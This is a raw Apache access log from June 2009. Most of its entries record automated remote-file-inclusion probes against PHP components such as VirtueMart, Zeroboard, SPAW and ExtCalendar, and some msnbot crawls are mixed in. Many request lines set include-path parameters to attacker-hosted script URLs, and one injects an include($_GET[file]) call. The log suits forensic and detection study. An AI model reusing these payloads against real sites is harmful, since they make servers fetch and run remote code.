124.0.139.129 - - [26/Jun/2009:13:09:55 -0500] "GET /logs/access_log.1240272000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:09:55 -0500] "GET /logs/access_log.1239321600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:10:40 -0500] "GET /logs/access_log.1238976000/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:13:12:10 -0500] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 354 "-""libwww-perl/5.822"
65.55.208.130 - - [26/Jun/2009:13:12:34 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [26/Jun/2009:13:12:34 -0500] "GET /logs/access_log.1201046400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
123.242.165.138 - - [26/Jun/2009:13:12:47 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.kltv.fi/mambots/content/plugin_jw_allvideos/devid.txt%0D?? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
123.242.165.138 - - [26/Jun/2009:13:12:48 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.kltv.fi/mambots/content/plugin_jw_allvideos/devid.txt%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
82.194.87.219 - - [26/Jun/2009:13:12:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 339 "-""libwww-perl/5.822"
190.144.44.36 - - [26/Jun/2009:13:13:12 -0500] "GET /logs/access_log.1236643200//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:13:13:12 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:13:13:12 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
190.144.44.36 - - [26/Jun/2009:13:13:13 -0500] "GET /logs/access_log.1241827200//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fucku5/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.106.237 - - [26/Jun/2009:13:14:55 -0500] "GET /logs/access_log.1128729600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.0.139.129 - - [26/Jun/2009:13:17:55 -0500] "GET /logs/access_log.1241654400/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:18:20 -0500] "GET /logs/access_log.1241913600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.0.139.129 - - [26/Jun/2009:13:18:35 -0500] "GET /logs/access_log.1241049600/?_zb_path=http://www.knt.hs.kr///id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:13:19:26 -0500] "GET /logs////administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 355 "-""libwww-perl/5.822"
83.16.182.130 - - [26/Jun/2009:13:19:40 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:13:19:40 -0500] "GET /logs/access_log.1238025600/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:13:19:40 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:19:51 -0500] "GET ////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:19:51 -0500] "GET /logs/access_log.1234483200////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:19:51 -0500] "GET /logs////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:19:52 -0500] "GET /logs/access_log.1234483200////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:19:52 -0500] "GET /logs////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:19:53 -0500] "GET ////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:19:54 -0500] "GET /logs/access_log.1239062400////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.140.23.185 - - [26/Jun/2009:13:19:58 -0500] "GET /logs/access_log.1239926400//admin/editor2/spaw_control.class.php?spaw_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
62.140.23.185 - - [26/Jun/2009:13:19:58 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.140.23.185 - - [26/Jun/2009:13:19:58 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
69.72.169.233 - - [26/Jun/2009:13:20:03 -0500] "GET /logs/access_log.1239062400////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.140.23.185 - - [26/Jun/2009:13:20:34 -0500] "GET /logs/access_log.1236988800//admin/editor2/spaw_control.class.php?spaw_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
195.34.78.110 - - [26/Jun/2009:13:20:40 -0500] "GET ////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:20:40 -0500] "GET /logs////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:20:40 -0500] "GET /logs/access_log.1234483200////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:20:45 -0500] "GET /logs/access_log.1239062400////shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:13:21:04 -0500] "GET /logs////administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 355 "-""libwww-perl/5.822"
65.55.106.229 - - [26/Jun/2009:13:22:24 -0500] "GET /logs/access_log.1196985600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.16.182.130 - - [26/Jun/2009:13:22:38 -0500] "GET /logs/access_log.1239580800/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:13:23:11 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 340 "-""libwww-perl/5.822"
62.140.23.185 - - [26/Jun/2009:13:23:13 -0500] "GET /logs/access_log.1236643200//admin/editor2/spaw_control.class.php?spaw_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
173.1.96.154 - - [26/Jun/2009:13:23:49 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
173.1.96.154 - - [26/Jun/2009:13:23:49 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.177.9.20 - - [26/Jun/2009:13:24:23 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 3248 "-""Mozilla/5.0"
81.177.9.20 - - [26/Jun/2009:13:24:23 -0500] "GET /logs/access_log.1238112000/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.177.9.20 - - [26/Jun/2009:13:24:23 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 3248 "-""Mozilla/5.0"
81.177.9.20 - - [26/Jun/2009:13:24:23 -0500] "GET /logs/access_log.1238112000/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.177.9.20 - - [26/Jun/2009:13:24:24 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 194793 "-""Mozilla/5.0"
81.177.9.20 - - [26/Jun/2009:13:24:25 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 194793 "-""Mozilla/5.0"
173.1.96.154 - - [26/Jun/2009:13:24:34 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
173.1.96.154 - - [26/Jun/2009:13:24:35 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
65.55.208.118 - - [26/Jun/2009:13:25:26 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:13:25:27 -0500] "GET /logs/access_log.1122076800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:13:25:27 -0500] "GET /logs/access_log.1115596800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:13:25:27 -0500] "GET /logs/access_log.1155772800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:13:25:27 -0500] "GET /logs/access_log.1151884800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.118 - - [26/Jun/2009:13:25:28 -0500] "GET /logs/access_log.1170547200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
125.131.116.12 - - [26/Jun/2009:13:26:06 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:13:26:06 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:13:26:06 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/ask_password.php?dir=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:26:21 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:26:21 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:26:21 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:13:26:43 -0500] "GET /logs/access_log.1238112000/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:13:26:43 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 3248 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:13:26:45 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 194793 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:13:27:08 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/ask_password.php?dir=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:13:27:42 -0500] "GET /logs/access_log.1238112000/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:13:27:42 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 3248 "-""Mozilla/5.0"
218.94.6.3 - - [26/Jun/2009:13:27:44 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 194793 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:13:28:07 -0500] "GET /logs////administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 355 "-""libwww-perl/5.822"
201.38.0.130 - - [26/Jun/2009:13:28:50 -0500] "GET /logs/access_log.1238112000/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
201.38.0.130 - - [26/Jun/2009:13:28:50 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 3248 "-""Mozilla/5.0"
201.38.0.130 - - [26/Jun/2009:13:29:10 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 194793 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:29:28 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:29:28 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:29:28 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.185 - - [26/Jun/2009:13:29:51 -0500] "GET /logs/access_log.1240012800//admin/editor2/spaw_control.class.php?spaw_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
58.227.193.198 - - [26/Jun/2009:13:30:39 -0500] "GET /logs/send_reminders.php?includedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.227.193.198 - - [26/Jun/2009:13:30:39 -0500] "GET /logs/access_log.1235433600/send_reminders.php?includedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.227.193.198 - - [26/Jun/2009:13:30:39 -0500] "GET /logs/access_log.1235001600/send_reminders.php?includedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.227.193.198 - - [26/Jun/2009:13:30:39 -0500] "GET /send_reminders.php?includedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:32:25 -0500] "GET //index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:32:25 -0500] "GET /logs//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:32:27 -0500] "GET /logs/access_log.1239667200//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:32:28 -0500] "GET /logs/access_log.1239494400//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:32:32 -0500] "GET //index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:32:32 -0500] "GET /logs//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:32:32 -0500] "GET /logs/access_log.1239235200//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:13:32:32 -0500] "GET /logs/access_log.1239667200//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:32:48 -0500] "GET /logs/access_log.1239667200//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:32:48 -0500] "GET /logs//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:32:48 -0500] "GET //index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.72.169.233 - - [26/Jun/2009:13:32:50 -0500] "GET /logs/access_log.1239494400//index.php?option=com_restaurante&task=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:33:55 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:33:55 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:33:55 -0500] "GET /logs/access_log.1239926400//ashnews.php?pathtoashnews=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:33:56 -0500] "GET //ashnews.php?pathtoashnews=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:34:12 -0500] "GET //ashnews.php?pathtoashnews=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:34:12 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:34:12 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.189.18.73 - - [26/Jun/2009:13:34:19 -0500] "GET /logs/access_log.1239926400//ashnews.php?pathtoashnews=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:13:34:31 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:13:34:31 -0500] "GET //bbs/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:13:34:31 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:13:34:38 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:13:34:38 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:13:34:38 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:13:34:58 -0500] "GET /logs/access_log.1237248000//bbs/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.53.70.114 - - [26/Jun/2009:13:35:27 -0500] "GET /logs/access_log.1237248000//bbs/outlogin.php?_zb_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:13:37:28 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:13:37:32 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:13:37:32 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:13:37:32 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/ask_password.php?dir=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:13:37:33 -0500] "GET /logs/access_log.1240272000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:13:37:33 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:13:37:34 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.131.116.12 - - [26/Jun/2009:13:38:30 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/ask_password.php?dir=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:13:39:28 -0500] "GET /module.php?mod=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:13:39:31 -0500] "GET /logs/access_log.1238371200/module.php?mod=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:13:39:32 -0500] "GET /logs/module.php?mod=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:13:39:49 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:13:39:49 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:13:39:49 -0500] "GET /logs/access_log.1239926400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:13:40:08 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:13:40:08 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:13:40:09 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
65.55.106.171 - - [26/Jun/2009:13:40:25 -0500] "GET /logs/access_log.1151712000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
123.242.165.138 - - [26/Jun/2009:13:40:33 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kltv.fi/mambots/content/plugin_jw_allvideos/devid.txt%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
123.242.165.138 - - [26/Jun/2009:13:40:33 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kltv.fi/mambots/content/plugin_jw_allvideos/devid.txt%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
69.10.159.229 - - [26/Jun/2009:13:40:41 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:13:40:41 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:13:40:41 -0500] "GET /logs/access_log.1239926400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.10.159.229 - - [26/Jun/2009:13:41:00 -0500] "GET /logs/access_log.1242000000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.106.163 - - [26/Jun/2009:13:41:26 -0500] "GET /logs/access_log.1109808000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
